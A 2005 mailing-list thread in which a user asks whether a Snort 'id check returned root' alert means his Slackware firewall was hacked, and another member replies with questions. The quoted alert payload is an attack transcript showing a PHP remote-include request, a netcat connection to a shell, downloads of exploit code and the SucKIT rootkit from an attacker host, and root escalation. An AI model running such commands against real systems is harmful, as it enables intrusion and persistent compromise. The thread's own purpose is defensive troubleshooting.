[wplug] Need help with a snort alert. Did my box get hacked?

Ken Rambler ken at ramblernet.com
Fri Oct 21 11:05:02 EDT 2005 

Chris,
 
Are you using IPTABLES or SHOREWALL? 
Do you have a wireless router on your LAN, and if so are you using wireless
encryption? 
Was this message from your firewall or a machine behind it? 
Which log contained the message?
 
At first glance this looks like a 404 entry from your HTTP log.
Ken

-----Original Message-----
From: wplug-bounces+ken=ramblernet.com at wplug.org
[mailto:wplug-bounces+ken=ramblernet.com at wplug.org] On Behalf Of Chris
Romano
Sent: Friday, October 21, 2005 9:13 AM
To: General user list
Subject: [wplug] Need help with a snort alert. Did my box get hacked?


I came in this moring and checked my snort alerts (morning routine), and
noticed the following:

ATTACK-RESPONSES id check returned root            2005-10-21 07:40:32
82.165.25.125:80             10.10.10.5:51949             TCP

Some background.  10.10.10.x is my dmz and 10.10.10.5 is a firewall/proxy
(Slack 10.1) that connects the 10.10.10.x to our 192.168.0.x internal
network.
So I started digging around. The alert logged the following:

SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit  *.* 
(c)oded by sd at sf.cz & devik at cdi.cz, 2001 
Configuring ./sk:.OK!.[attacker at badass.cz ~/sk10]$ telnet lamehost.com
80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character is
'^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1.Host:
lamehost.com ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52 GMT.Server:
Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1.Last-Modified: Fri, 28
Sep 2001 04:42:34 GMT.ET ag: "31c6-c2-3bb3ffba".Content-Type:
text/html..IT WERKS! Shell at port 8193 Connection closed by foreign
host..[attacker at badass.cz~/sk10]$ nc -v lamehost.com 8193.lamehost.com
[192.168.0.2] 8193 (?) open.w.12:08am up  1:20,  3 users,  load average:
0.05, 0.06,0.08.USER     TTY      FROM    LOGIN at IDLE   JCPU   PCPU  AT.root
tty1     -  11:58pm 39:03   3.15s  2.95s  bash.cd /tmp.lynx -dump
http://badass.cz/s.c  <http://badass.cz/s.c&gt> &gt; s.c.gcc s.c o
super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(roo
t) gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd
.l33t.lynx -dump http://badass.cz/~attacker/sk10/s
k &gt; sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w

Ok, there a few things that make me think that this is a false positive.
First is the "192.160.0.02" IP.  That is not on this network.  Second, There
is no host on 192.168.0.2.  Third, I do not have any Red Hat machines.  They
are all Slackware.  I am still concerned.  I searched for "sk" and all I
found are two directories related to vim and I didn't find a directory
called "l33t".

Can anyone me verify that I wasn't hacked?

Thanks,
Chris


-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.wplug.org/pipermail/wplug/attachments/20051021/71fd8b14/attachment.html

More information about the wplug mailing list